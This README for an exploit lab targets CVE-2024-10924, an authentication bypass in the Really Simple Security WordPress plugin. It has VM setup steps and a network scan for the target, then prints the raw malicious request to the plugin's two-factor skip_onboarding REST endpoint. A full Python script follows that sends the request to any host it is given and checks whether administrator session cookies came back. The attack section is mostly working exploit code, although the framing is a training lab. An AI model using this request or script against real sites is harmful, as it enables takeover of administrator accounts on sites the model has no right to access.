Associated Vulnerability
Title: Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 - 9.1.1.1 - Authentication Bypass (CVE-2024-10924)
Description: The Really Simple Security (Free, Pro, and Pro Multisite) plugins for WordPress are vulnerable to authentication bypass in versions 9.0.0 to 9.1.1.1. This is due to improper user check error handling in the two-factor REST API actions with the 'check_login_and_get_user' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, when the "Two-Factor Authentication" setting is enabled (disabled by default).
Readme
# CVE-2024-10924 Bypass MFA WordPress - Exploit Lab
This repository provides a lab for exploiting `CVE-2024-10924` in the Really Simple Security plugin for `WordPress`, specifically to bypass the plugin's `two-factor authentication (MFA)` step and gain access to the `WordPress` administration panel.
## Prerequisites
To deploy this lab in your environment, follow the steps below:
## **Deploy WordPress on VMware**
Unzip the LAB `zip`. In VMware, click `Open` to import a machine, select the file named `Ubuntu-Bypass-MFA-Wordpress.vmx`, and finally click `Power` to start the vulnerable machine.
[Download LAB](https://drive.google.com/file/d/1a8h6HHDFfkyZRGUdvXdQtcYxLiXH8n_I/view?usp=sharing)
## **Configure Kali Linux**
On your Kali machine, make sure the following tool and Python packages are installed:
- `nmap`: used for the network scans.
- `requests`: Python library used for the HTTP requests (install with `pip install requests`).
- `rich`: Python library used for formatted console output (install with `pip install rich`).
## **Get WordPress machine IP**
To get the IP of the WordPress machine in the network environment, run the following script from your Kali machine:
```bash
$ python3 knowIPwordpress.py
```
This script does the following:
- Detects your local `IP`.
- Scans the corresponding network segment to find active `IPs`.
- Performs a port scan for `HTTP` services.
- Checks which host's `HTTP` service serves a page with the title `"Bypass-MFA"`; that host is the WordPress machine.

Once found, it shows you the `URL` where you can access the `WordPress` administration panel:
```bash
Access WordPress at: http://<IP>/wp-admin
```
## Two-Factor (MFA) Bypass:
### WordPress credentials:
```
admin:admin
```
When you try to log in to `WordPress` with these credentials, it asks you for `two-factor verification (MFA)`. To bypass this step, run the following script on your `Kali` machine:
```bash
$ python3 bypass-MFA-Wordpress.py
```
### How the `bypass-MFA-Wordpress.py` script works
This script exploits `CVE-2024-10924` to bypass the two-factor verification and gain access to the `WordPress` administration panel.
## Script flow:
Get session cookie: The script sends an `HTTP` `POST` request to the `reallysimplessl/v1/two_fa/skip_onboarding` REST endpoint. Because the vulnerable versions mishandle the failed user/nonce check (see the vulnerability description above), the endpoint issues a valid session cookie for the requested `user_id` even though the `login_nonce` is a made-up value.
The request is sent with the following JSON body:
```json
{
"user_id": 1,
"login_nonce": "133333337",
"redirect_to": "/wp-admin/"
}
```
## Login Request:
Once the cookie is obtained, the script prompts for the `WordPress` username and password. It then sends a `POST` request to the `wp-admin/profile.php` endpoint with the provided credentials to log in.
## Generation of an HTML file:
If the bypass is successful, the script saves the administrator dashboard response to an `.html` file and opens it in your default browser.
You now have access to the `WordPress` administration panel!
## Manual way (Bypass-MFA-Wordpress):
If you prefer to do it manually with `BurpSuite`, you first need the `Endpoint` the request has to be sent to in order to capture the `Cookies`. You can obtain it with:
```bash
$ python3 endpointWordpress.py
```
This prints the request to paste into `BurpSuite` (Repeater) in order to capture the `Cookies`; in my case it looks like this:
```http
POST http://192.168.5.192/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
Host: 192.168.5.192
Content-Type: application/json
Content-Length: 89
Connection: keep-alive

{
"user_id": 1,
"login_nonce": "133333337",
"redirect_to": "/wp-admin/"
}
```
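The exchange described in the script flow above and in the Burp request, as an added Python example that is not one of this repository's scripts: it builds the same `skip_onboarding` request with a `Content-Length` computed from the body, and decides whether the bypass worked by looking for WordPress auth cookies (`wordpress_logged_in_*`, `wordpress_sec_*`) in the `Set-Cookie` headers of the response. The lab host `192.168.5.192` is taken from the README; the cookie hash suffix and the sample `Set-Cookie` values are constructed for illustration, and the checker only touches the network when you pass a host on the command line.

```python
"""Added example for the CVE-2024-10924 lab (not one of the repository's own
scripts). Builds the skip_onboarding request from the README and checks a
response for WordPress auth cookies. The sample Set-Cookie values below are
constructed, not captured from a real host."""
import http.client
import json
import sys
from typing import Dict, List, Tuple

# REST route from the README's Burp request.
ENDPOINT = "/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding"

# Cookie names WordPress sets when it logs a user in; the suffix after the
# prefix is the site-specific cookie hash, so match on the prefix only.
AUTH_COOKIE_PREFIXES = ("wordpress_logged_in_", "wordpress_sec_", "wordpress_")


def build_payload(user_id: int = 1, login_nonce: str = "133333337",
                  redirect_to: str = "/wp-admin/") -> bytes:
    """JSON body from the README. user_id=1 is normally the first admin.
    The nonce is a dummy value: the vulnerable versions do not act on a
    failed nonce check, which is the bug being exercised."""
    body = {"user_id": user_id, "login_nonce": login_nonce,
            "redirect_to": redirect_to}
    return json.dumps(body, indent=4).encode()


def build_raw_request(host: str, payload: bytes) -> str:
    """Raw HTTP/1.1 request for Burp Repeater. Content-Length is derived from
    the body instead of hand-typed, lines are CRLF-separated, and the blank
    line between headers and body is present."""
    lines = [
        f"POST {ENDPOINT} HTTP/1.1",
        f"Host: {host}",
        "Content-Type: application/json",
        f"Content-Length: {len(payload)}",
        "Connection: close",
    ]
    return "\r\n".join(lines) + "\r\n\r\n" + payload.decode()


def auth_cookies(set_cookie_values: List[str]) -> Dict[str, str]:
    """Map auth cookie name -> value from a list of Set-Cookie header values.
    wordpress_test_cookie shares the prefix but is not an auth cookie."""
    found: Dict[str, str] = {}
    for header in set_cookie_values:
        name, _, rest = header.partition("=")
        name = name.strip()
        if name == "wordpress_test_cookie":
            continue
        if name.startswith(AUTH_COOKIE_PREFIXES):
            found[name] = rest.split(";", 1)[0]
    return found


def bypass_succeeded(set_cookie_values: List[str]) -> bool:
    """True when the response carries a wordpress_logged_in_* cookie, i.e.
    the endpoint logged us in without a valid nonce or password."""
    return any(n.startswith("wordpress_logged_in_")
               for n in auth_cookies(set_cookie_values))


def send_to_lab(host: str, payload: bytes,
                timeout: float = 5.0) -> Tuple[int, List[str]]:
    """Send the request to the lab VM and return (status, Set-Cookie values).
    Only called when a host is given on the command line."""
    conn = http.client.HTTPConnection(host, timeout=timeout)
    conn.request("POST", ENDPOINT, body=payload,
                 headers={"Content-Type": "application/json"})
    resp = conn.getresponse()
    # getheaders() keeps duplicate headers, so every Set-Cookie is preserved.
    cookies = [v for k, v in resp.getheaders() if k.lower() == "set-cookie"]
    conn.close()
    return resp.status, cookies


# Constructed sample responses: a vulnerable plugin logs the user in and sets
# auth cookies; a patched one rejects the bogus nonce and sets none.
SAMPLE_VULNERABLE = [
    "wordpress_sec_5e2b1c=admin%7C1700000000%7Ctok%7Cmac; path=/wp-content/plugins; secure; HttpOnly",
    "wordpress_logged_in_5e2b1c=admin%7C1700000000%7Ctok%7Cmac; path=/; HttpOnly",
]
SAMPLE_PATCHED = ["wordpress_test_cookie=WP%20Cookie%20check; path=/"]


if __name__ == "__main__":
    # Lab IP from the README when no host is given; then only the raw
    # request is printed and nothing is sent.
    host = sys.argv[1] if len(sys.argv) > 1 else "192.168.5.192"
    payload = build_payload()
    print(build_raw_request(host, payload))
    if len(sys.argv) > 1:
        status, cookies = send_to_lab(host, payload)
        print(status, "BYPASSED" if bypass_succeeded(cookies) else "not bypassed")
```

Run it with the lab VM's IP as the only argument and only against the lab. With no argument it prints the raw request, which can be pasted into Burp Repeater (Repeater recalculates `Content-Length` when you edit the body, so the value shown above does not need to be maintained by hand). A plugin that handles the failed nonce check correctly answers without a `wordpress_logged_in_*` cookie, which the checker reports as not bypassed.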
## More information in my YT video:
LINK = [Video CVE-2024-10924-Bypass-MFA-Wordpress-LAB](LINK)
File Snapshot
[4.0K] /data/pocs/5836471f6358636acaba6c937268cd483e5555a5
├── [4.3K] bypass-MFA-Wordpress.py
├── [1.5K] endpointWordpress.py
├── [4.6K] knowIPwordpress.py
├── [4.0K] plugin_vuln
│ └── [1.3M] really-simple-ssl.zip
├── [3.7K] README.md
└── [4.0K] wordpressIMG-VMWare
└── [ 144] DownloadLABWordpress.md
2 directories, 6 files